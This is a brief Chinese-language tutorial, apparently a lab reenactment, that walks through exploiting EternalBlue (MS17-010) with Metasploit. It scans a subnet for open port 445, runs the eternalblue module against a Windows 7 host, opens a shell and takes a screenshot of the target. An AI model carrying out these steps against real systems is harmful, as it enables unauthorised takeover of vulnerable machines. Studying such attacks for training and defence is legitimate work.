永恒之蓝案例重演

1、输入msfconsole进入工具使用菜单

2、永恒之蓝的编号是ms17-010,可以直接搜索search ms17-010

3、首先利用扫描辅助工具扫描漏洞端口（永恒之蓝攻击的端口是445）

Use auxiliary/scanner/smb/smb_ms17_010

Requird列表下面显示yes是必填项

RHOSTS需要填写要扫描的目标地址或者目标网段，我这里扫描了网段192.168.1.1/24

Set rhosts 192.168.1.1/24

同时需要设置线程数（线程数越大扫描速度越快，根据自己网络情况来定）

Set threads 50

然后就可以跑程序了

Run

这里发现了一台主机win7的445端口是开放的，可以实现攻击了

4、利用永恒之蓝的攻击工具进行攻击

Use exploit/windows/smb/ms17_010_eternalblue

5、设置需要攻击的目标，上面已经扫描出可以利用的主机ip

Set rhosts 192.168.1.50

查看该目标是否可以利用,下面显示目标可利用

Check

6、可以进行攻击

Run

下面显示攻击成功！！！

现在已经获取了目标主机的所有权限了

7、shell 进入系统盘会有乱码执行chcp 65001可解决问题

8、现在就可以运程做任何像做的事情了，比如截屏目标主机当前的屏幕

Screenshot

截屏图片自动保存在下面的文件路径